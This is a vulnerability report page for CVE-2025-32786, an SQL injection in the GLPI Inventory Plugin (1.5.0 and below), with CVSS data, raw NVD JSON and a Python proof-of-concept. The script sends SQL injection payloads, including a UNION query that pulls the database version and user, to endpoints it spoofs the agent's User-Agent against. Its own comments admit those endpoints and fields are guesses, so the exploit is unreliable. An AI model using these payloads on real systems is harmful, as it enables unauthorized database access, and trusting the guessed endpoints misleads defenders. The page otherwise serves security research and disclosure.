Security Vulnerability Report
CVE-2025-32786 CVSS 7.5 HIGH

CVE-2025-32786

Published: 2025-11-04 21:15:37
Last Modified: 2026-04-15 00:35:42

Description

The GLPI Inventory Plugin handles network discovery, inventory, software deployment, and data collection for GLPI agents. Versions 1.5.0 and below are vulnerable to SQL Injection. This issue is fixed in version 1.5.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GLPI Inventory Plugin <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-32786 SQL Injection PoC
# Target: GLPI Inventory Plugin <= 1.5.0
# Author: Security Researcher
# Note: This is a proof-of-concept for authorized security testing only
#
# NOTE(review): the NVD record above says only that versions <= 1.5.0 are
# "vulnerable to SQL Injection" (CWE-89); it does not name an endpoint or a
# parameter. The paths, field names and payloads below are this script's own
# assumptions, so a negative result from it is not evidence that a deployment
# is patched. Confirm against the GHSA advisory listed in the references.
import requests
import sys


def test_sql_injection(url: str, target_param: str) -> bool:
    """Probe one form field of inventory.php for leaked database errors.

    Posts each string in ``payloads`` as ``target_param`` (together with
    ``action=inventory``) to ``<url>/plugins/glpiinventory/front/inventory.php``
    and scans the response body for the substrings in ``sql_errors``.

    Args:
        url: base URL of the GLPI instance; the plugin path is appended with a
            leading slash, so a trailing slash on ``url`` yields ``//``.
        target_param: name of the form field that receives each payload.

    Returns:
        True on the first response whose body contains one of the error
        markers; False when no payload produced a marker, including the case
        where every request failed at the transport level.
    """
    # Basic injection test payload
    payloads = [
        "' OR '1'='1",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "'; SELECT * FROM glpi_users--"
    ]
    # Mimics the agent's User-Agent; log- or WAF-based detection for this CVE
    # should therefore key on the request body, not on the UA string.
    headers = {
        'User-Agent': 'GLPI-Inventory-Agent/1.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    for payload in payloads:
        try:
            data = {
                target_param: payload,
                'action': 'inventory'
            }
            response = requests.post(
                f"{url}/plugins/glpiinventory/front/inventory.php",
                data=data,
                headers=headers,
                timeout=10
            )
            # Check for SQL error indicators
            # Detection relies solely on these substrings appearing in the
            # body: a deployment that does not echo database errors is never
            # flagged here, whatever the backend actually did with the input.
            sql_errors = [
                'SQL syntax',
                'MySQL server version',
                'Warning: mysql',
                'PDOException',
                'SQLSTATE'
            ]
            for error in sql_errors:
                if error in response.text:
                    print(f"[+] SQL Injection detected with payload: {payload}")
                    print(f"[+] Error found: {error}")
                    return True
        except requests.exceptions.RequestException as e:
            # A transport failure for one payload is reported and the loop
            # moves on to the next payload.
            print(f"[-] Request failed: {e}")
    # NOTE(review): the collapsed original loses the indentation of this
    # ``return False``; it is placed at function level here (the usual
    # reading). If it sat inside the ``except``, the first failed request
    # would end the whole probe — verify against the original file.
    return False


def extract_data(url: str) -> str | None:
    """Post a fixed UNION payload to discovery.php and return the raw body.

    Sends ``union_payload`` in the ``ip`` field (with ``action=discover``) to
    ``<url>/plugins/glpiinventory/front/discovery.php``. Only the HTTP status
    and the body length are printed; nothing here parses or validates the
    response, so the caller must inspect the returned text itself.

    Args:
        url: base URL of the GLPI instance (see ``test_sql_injection``).

    Returns:
        The response body as text, or None if any exception was raised while
        sending the request (the handler is a broad ``except Exception``).

    NOTE(review): the endpoint, the ``ip`` field and the shape of the payload
    are assumptions of this script, not facts from the advisory.
    """
    # Example: Extract database version and current user
    union_payload = "' UNION SELECT @@version,user(),3,4,5--"
    headers = {
        'User-Agent': 'GLPI-Inventory-Agent/1.0'
    }
    data = {
        'ip': union_payload,
        'action': 'discover'
    }
    try:
        response = requests.post(
            f"{url}/plugins/glpiinventory/front/discovery.php",
            data=data,
            headers=headers,
            timeout=30
        )
        print(f"[+] Response status: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
        return response.text
    except Exception as e:
        # Broad catch: every failure (network, decoding, ...) is printed and
        # swallowed; the caller only sees None.
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    # Entry point: exactly one positional argument, the base URL of the
    # instance; anything else prints usage and exits with status 1.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-32786.py <target_url>")
        print("Example: python cve-2025-32786.py http://vulnerable-glpi.local")
        sys.exit(1)
    target_url = sys.argv[1]
    print(f"[*] Testing CVE-2025-32786 on {target_url}")
    # 'ip' is the field name this script guesses for the injection point; the
    # advisory text on this page does not name one.
    if test_sql_injection(target_url, 'ip'):
        print("[!] Target is likely vulnerable!")
        print("[*] Attempting data extraction...")
        # Return value is discarded: the body is only reported by length above.
        extract_data(target_url)
    else:
        print("[-] No obvious SQL injection detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32786", "sourceIdentifier": "[email protected]", "published": "2025-11-04T21:15:36.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GLPI Inventory Plugin handles network discovery, inventory, software deployment, and data collection for GLPI agents. Versions 1.5.0 and below are vulnerable to SQL Injection. This issue is fixed in version 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/glpi-project/glpi-inventory-plugin/blob/1.5.1/CHANGELOG.md", "source": "[email protected]"}, {"url": "https://github.com/glpi-project/glpi-inventory-plugin/releases/tag/1.5.1", "source": "[email protected]"}, {"url": "https://github.com/glpi-project/glpi-inventory-plugin/security/advisories/GHSA-w2cp-r675-6xpq", "source": "[email protected]"}]}}